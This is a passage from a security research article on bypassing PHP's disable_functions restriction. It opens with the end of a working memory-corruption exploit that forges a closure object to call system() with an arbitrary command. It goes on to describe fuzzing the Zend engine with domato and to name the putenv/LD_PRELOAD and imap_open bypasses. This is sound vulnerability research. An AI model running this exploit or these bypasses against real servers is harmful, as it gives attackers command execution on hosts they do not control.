$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if (!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if (!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if (!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if (!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
# fake closure object
$fake_obj_offset = 0xd0;
for ($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
# pwn
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4); # internal func type
write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
($helper->b)($cmd);
exit();
}

Scouting for new rivals: finding low-hanging fruits with grammar-aware fuzzing

The previous sections have focused on PHP internals and explaining how to exploit a vulnerability to subvert the effects of the disable_functions directive. In this section we will address some issues related to fuzzing and vulnerability searching in the Zend engine.

Before diving into the subject it is worth mentioning that there are a lot of crashes and other reported bugs in the PHP Bug Tracker[14], that may be exploitable but go unnoticed. This is the case of, for example, the vulnerability that was exploited in the previous section: the problem has been known for about 2 years. These situations occur for various reasons:

  • Whoever opens the ticket in the bug tracker does not provide enough information, and/or the code attached is too long or too short, making it difficult to identify the root cause or even verify the reproducibility of the crash.
  • The issue is considered to be a minor bug, it is not considered as a security problem and its fix is postponed. This is because of the criteria under which PHP classifies bugs[15], bugs where arbitrary user-controlled code has been used are not considered security issues. In practice, most of the time this translates to: local vulnerabilities must be reported as regular bugs.
  • The root cause of the bug is difficult to fix and proposed patches do not fix the problem completely.

So it is very interesting to check the Bug Tracker for vulnerabilities hidden in plain sight. On the other hand, checking which engine components are more prone to problems allows us to focus the effort there, besides that through fuzzing it is common to re-discover crashes that other people have previously identified and reported.

There are multiple approaches to search for PHP vulnerabilities by fuzzing, both in terms of where to focus and of the technique to use. Regarding the focus, it is unlikely to find vulnerabilities in the language parser itself, so it is not worth spending time on it. Historically, because of its design, PHP deserialization (unserialize()) is quite problematic and security flaws will always appear, in addition to its exploitation being prone to lead to an RCE (although currently the use of unserialize() is discouraged, various CMS and other platforms make use of this function on serialized data over which the user has control -as in cookies-). There are several articles covering the basics on fuzzing this function [16][17], and on its exploitation [18].

Our goal is identifying vulnerabilities that may allow circumventing disable_functions, so any code flow that allows us to obtain arbitrary read and write memory primitives is sufficient. In this context, and after contrasting with past experiences, it is preferable to follow an approach more focused on finding “superficial” or shallow crashes, rather than to focus on a specific component (streams, pack/unpack, DOM/XML, etc.); in other words: maximize the results while making the minimum effort. To this end we will follow a fuzzing strategy generating “grammatically” valid portions of PHP code[19] (i.e. when executed they won’t return a syntax error), without taking into account any feedback for generating new test cases. There are other strategies to follow, such as performing simple mutations at the AST level using projects like PHP-AST[20]), or even going further and extending the AFL capabilities to perform mutations as the Superion project does[21].

In this case Domato[22] will be used for generating the test cases. A modified, PHP-oriented version was recently published under the name domatophp[23]. The most interesting thing about this modified version is that it includes dictionaries with rules and function definitions, allowing us to save a lot of time. However, it is possible to considerably improve the amount of unique crashes identified by making some improvements. For example, function parameter definitions have been extracted by parsing the PHP.NET documentation, this source of information being sometimes not completely accurate (e.g. some string parameters that actually are paths, the existence of hidden undocumented parameters [24], etc.).

To complement the function definitions brought by domatophp, two strategies are followed: on one hand the real parameters are extracted directly from the source code (by parsing the macros), and on the other hand the error messages are analyzed. This is done using a very simple GDB script[25].

Extracting parameters

On the other hand, domato allows assigning probabilities to the rules it applies during code generation, which is interesting for certain fuzzed parameters. For example, in the case of functions that use file or directory paths it is not very interesting to always use random text strings. Usually these functions first validate the path, and then its characteristics (if it is a file or a directory, if you have read/write permissions or not); so by playing with different parameters (a path to a file with read-only permissions, another one with write permissions, directories, etc.) it is possible to reach different states.

<pathfuzz p=0.1> = <stringfuzz>
<pathfuzz p=0.4> = <pathrwfuzz>
<pathfuzz p=0.4> = <pathrofuzz>
<pathfuzz p=0.1> = <pathdirfuzz>

Other improvements are the use of str_shuffle() to deal with cache optimizations, regular calls to var_dump(), increased number of parameters when they vary, etc. As for how to run the test cases, a small C code has been created that makes use of posix_spawn in parallel to start the processes with vfork()[26]. This provides an “acceptable” speed of runs per second.

The test cases that have generated crashes are simplified and synthesized with a small python script, so that you start with a PHP script of hundreds of lines that looks like this:

...
try { try { simplexml_load_file(str_repeat(chr(160), 65) + str_repeat(chr(243), 257) + str_repeat(chr(211), 65537), str_repeat(chr(47), 65537) + str_repeat(chr(188), 65537), 0, implode(array_map(function($c) {return "\\x" . str_pad(dechex($c), 2, "0");}, range(0, 255))), true); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["SplObjectStorage"]->offsetGet($vars[array_rand($vars)]); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["ReflectionProperty"]->getName(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["SplDoublyLinkedList"]->shift(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["SplFixedArray"]->setSize(1073741823); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["SplFixedArray"]->count(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { mb_http_input(str_repeat("A", 0x100)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["ReflectionProperty"]->setValue(-2147483648); } catch (Exception $e) { } } catch(Error $e) { }
try { try { str_split(implode(array_map(function($c) {return "\\x" . str_pad(dechex($c), 2, "0");}, range(0, 255))), 0); } catch (Exception $e) { } } catch(Error $e) { }
try { try { ctype_upper(str_repeat(chr(149), 257) + str_repeat(chr(208), 17)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["SplFixedArray"]->rewind(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["ReflectionProperty"]->isDefault(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["DOMDocument"]->createComment(str_repeat("A", 0x100)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { strip_tags(str_repeat(chr(162), 4097) + str_repeat(chr(12), 257), str_repeat(chr(47), 1025)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { strrpos(str_repeat("A", 0x100), 2.2250738585072011e-308, -1); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["ReflectionProperty"]->isProtected(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { ctype_alnum("/etc/passwd"); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["DOMElement"]->setAttributeNodeNS(new DOMAttr("attr")); } catch (Exception $e) { } } catch(Error $e) { }
try { try { stream_wrapper_unregister(str_repeat(chr(49), 4097)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["ReflectionClass"]->hasMethod(str_repeat(chr(230), 4097)); } catch (Exception $e) { } } catch(Error $e) { }
...

And end up with this other one, much easier to understand and debug later:

<?php
$aaa = new SimpleXMLElement("<a>a</a>");
$aaaa->xpath(str_repeat(chr(40), 65537));
?>
//This is a real crash found in the first 10 minutes

This size reduction of the test cases, together with its simplification, allows a first classification in terms of the affected component, as well as comparing crashes among them to rule out duplicates (execution traces are also used, such as the call stack, the instruction that caused the segfault, the ASAN output, etc.).

Considering all parts, the general operation scheme is the following:

Operation scheme

Finally, we only need to analyze the crashes and check which ones are caused by real vulnerabilities instead of by a simple bug.

Playing in other leagues: alternative ways to bypass disable_functions

In addition to vulnerabilities that allow arbitrary memory manipulation, there are other cases in which it is possible to execute system commands despite the restrictions imposed by disable_functions. As seen in previous sections, this directive works by changing the handlers of disabled functions. It is possible that classic vulnerabilities, such as command injection, are identified among the enabled functions, allowing them to be exploited in order to achieve arbitrary command execution. For example, this happened recently with the function imap_open()[27]. Another case takes place whenever the function putenv() is enabled in conjunction with any function that initiates an external process (e.g. mail() which by default executes the sendmail binary), this being the technique used by our tool Chankro[28] to execute arbitrary binaries using LD_PRELOAD[29].

In both cases we find a common pattern where PHP ends up invoking syscalls such as execve to start a new process. Using the domatophp grammar rules, in conjunction with our improvements from the GDB scripts, it is possible to create test cases for each function registered in the Zend engine and check if execve or another interesting syscall is called.

while read p; do
cat template.php > alchi/topo.php
echo "$p" >> alchi/topo.php
echo "$p" >> log.txt
strace -f php -r 'eval(file_get_contents("php://stdin"));' < alchi/topo.php 2>&1 | grep exe | grep sh >> log.txt
rm alchi/topo.php
done < funcs.txt

In the case of a minimal compilation, with no extensions at all, only mail() appears as a candidate:

Checking syscalls

It can be interesting to check all the functions in each new PHP version, as well as to install the extensions that different distros use by default, in order to detect new ways of exploitation.

Conclussions

In this article we have discussed in depth how disable_functions works, as well as exemplified the exploitation of PHP vulnerabilities to bypass it. Likewise, a methodology for identifying new vulnerabilities has been explained. Both the fuzzing process, and the search for alternatives to mail() + putenv(), must be continuously executed over time, refreshing the target with each new version of PHP. It is also interesting to use different build options (with special emphasis on extensions) based on the most common distributions.